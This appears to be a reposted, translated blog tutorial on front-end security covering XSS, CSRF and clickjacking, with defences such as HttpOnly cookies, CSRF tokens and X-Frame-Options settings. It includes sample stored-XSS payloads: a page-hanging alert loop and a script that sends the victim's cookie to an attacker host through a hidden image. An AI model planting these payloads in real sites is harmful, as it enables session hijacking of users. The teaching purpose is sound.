Front-end security knowledge: CSRF attacks and XSS attacks

XSS

XSS (Cross Site Scripting) is the most common and basic way of attacking a web site: the attacker injects illegal HTML tags or JavaScript code so that, when a user browses the page, the attacker controls the user's browser.

XSS falls into three categories:

DOM XSS:

DOM stands for Document Object Model. The DOM is the object representation of HTML, XHTML and XML documents; through it, programs and scripts can dynamically access and update a document's content, structure and style. DOM XSS does not need the server to take part in parsing the response: it is triggered entirely by DOM parsing on the browser side, so it can be regarded as a purely client-side problem.

Reflected XSS:

Reflected XSS, also known as non-persistent XSS, is the XSS vulnerability most likely to occur today. The XSS code appears in the URL of a request, the URL is submitted to the server, the server includes that XSS code in the content of its response, and the browser then parses and executes it.

Stored XSS:

Stored XSS, also known as persistent XSS, is the most dangerous kind of cross-site scripting. Compared with reflected XSS and DOM XSS it is better hidden, and therefore more dangerous, because it does not need the user to trigger it manually. Any web application that lets users store data may have a stored XSS vulnerability: the attacker submits a piece of XSS code once, it is received and stored on the server side, and every visitor who opens the affected page is then hit by it. The most typical example is a message board.

Cross-site scripting attacks can cause the following effects:

  • Defrauding users with a fake personal-information input form.

  • Using a script to steal the user's cookie value, so that the victim unknowingly helps the attacker send malicious requests.

  • Showing fake articles or pictures.

Stored XSS case

In project development, comments are a common feature. If the content of a comment is saved directly to the database, the page that later displays it can be attacked.

If you just want to test for XSS, it can be:

<font size="100" color="red">试试水</font>

If it is a little malicious, it can be:

<script>
while (true) {
    alert('Hello')
}
</script>

At this point the page hangs.

Of course, the most common XSS attack reads the cookie:

<script>
    alert(document.cookie)
</script>

 

Sending the cookie to the attacker's site:

var img = document.createElement('img')
img.src = 'http://www.xss.com?cookie=' + document.cookie
img.style.display = 'none'
document.getElementsByTagName('body')[0].appendChild(img)

The current user's login credentials are kept in the server-side session, while the browser holds them in the form of a cookie. If an attacker obtains the user's login cookie, they can bypass the login process entirely and access the user's account just by setting that cookie value.

Defense

It stands to reason that wherever there is locally entered data, XSS is a possible hazard.

HttpOnly: once the HttpOnly attribute is set on a cookie, JavaScript can no longer read that cookie's value.

// koa
ctx.cookies.set(name, value, {
    httpOnly: true // defaults to true
})

Filtering

Input checking is generally used to verify the input format, for example that an email address, phone number, user name, password and so on follow the prescribed format.

This is not only the front end's responsibility: the back end must do the same checks and filtering, because an attacker can bypass the normal entry flow and send data directly to the relevant interface on the server.

HtmlEncode: in some cases user data cannot be strictly filtered, and the tags need to be encoded instead.

When the user enters <script> window.location.href = "http://www.baidu.com" </script>, the encoded form is what is finally saved, and at display time the browser turns these characters into text rather than into a piece of code that can be executed.

JavaScriptEncode: escapes the following characters with a backslash

CSRF

CSRF (Cross-Site Request Forgery), also called one-click attack or session riding, means initiating a request while impersonating the user (without the user's knowledge) in order to do things contrary to the user's wishes (such as modifying user information, deleting comments, and so on).

It may cause the following effects:

  • Using the authenticated user's rights to update settings information;

  • Using the authenticated user's rights to purchase goods;

  • Using the authenticated user's rights to post on a message board.

[Figure: illustration of the CSRF principle; the image is not reproduced in this copy]

In short: the site trusts the user too much.

Difference from XSS

CSRF is typically carried out by way of XSS, and CSRF is sometimes also called XSRF (a CSRF attack can also be carried out in other ways, for example by initiating the request directly from the command line).

Essentially, XSS is a code-injection problem, while CSRF is an HTTP problem. XSS happens because content is not filtered, so the browser executes the attacker's input as code. CSRF happens because the browser automatically attaches cookies when it sends an HTTP request, and a site's session is normally kept in those cookies.

[Figure: a CSRF example; the image is not reproduced in this copy]

Defense

  • Verification code (CAPTCHA): forces the user to interact with the application in order to complete the final request. This is a good deterrent against CSRF, but the user experience is poor.

  • Use POST where possible and restrict GET: as the example above shows, CSRF over GET is far too easy to carry out, but POST is not foolproof either; the attacker only needs to construct a form.

  • Referer check: restricts the source of the request. This is the cheapest method, but it cannot guarantee 100% effectiveness, because the server cannot always obtain the Referer, and older browser versions carry a risk of Referer forgery.

  • Token: token validation is recognized as the most appropriate CSRF defense mechanism.

The whole idea is as follows:

Step one: the back end randomly generates a token and saves it in the session; the same token is also sent to the front-end page.

Step two: when the front-end page submits a request, it adds the token to the request data or to a header, and it is passed along to the back end.

Step three: the back end verifies that the token in the session and the token sent by the front end are the same; if they match the request is legitimate, otherwise it is an illegal request.

If the site has an XSS vulnerability at the same time, this method is empty talk.

Clickjacking

Clickjacking refers to the use of a transparent or disguised trap overlaid on top of a web page, which tricks the user into clicking it unknowingly and so visiting content the attacker chose. This behaviour is also known as UI redressing (interface disguise).

There are roughly two ways:

  • The attacker overlays a transparent iframe on a page and tricks the user into operating on that page; the user then clicks into the transparent iframe unknowingly;

  • The attacker covers the page with a picture that hides the meaning of the original element at that position.

Case

[Figure: clickjacking illustration; the image is not reproduced in this copy]

The general steps:

  • The attacker creates a web page that includes the target site in an iframe;

  • The target site is hidden, so that users cannot detect its presence;

  • The page is built so as to induce the user to click a button;

  • The user clicks the button and unknowingly triggers the malicious page's command.

Defense

X-FRAME-OPTIONS:

The X-Frame-Options HTTP response header tells the browser whether the page may be shown inside a <frame>, <iframe> or <object> tag. A web site can use it to ensure that its content is not embedded into other people's sites, and so avoid clickjacking attacks.

There are three values:

DENY: the page is not allowed to be shown in a frame at all, not even when nested in a page of the same domain.

SAMEORIGIN: the page may be shown in a frame of a page on the same domain.

ALLOW-FROM url: the page may be shown in a frame on the specified origin.

Configuring X-FRAME-OPTIONS:

Apache

Add the following line to the 'site' configuration:

Header always append X-Frame-Options SAMEORIGIN

nginx

Add the following line to the 'http', 'server' or 'location' configuration:

add_header X-Frame-Options SAMEORIGIN;

IIS

Add the following to the Web.config configuration file:

<system.webServer>
  ...
  <httpProtocol>
    <customHeaders>
      <add name="X-Frame-Options" value="SAMEORIGIN" />
    </customHeaders>
  </httpProtocol>
  ...
</system.webServer>

Checking and redirecting the top-level window in JavaScript can easily be defeated, so it is of little significance:

function locationTop() {
  // if this page is not the top-level window, break out of the frame
  if (top.location != self.location) {
    top.location = self.location;
    return false;
  }
  return true;
}
locationTop();

// Defeat:
// put the following code in the top-level window
var location = document.location;
// or
var location = "";

Reproduced from: https://www.cnblogs.com/still1/p/11008173.html

Origin: blog.csdn.net/weixin_34113237/article/details/93169260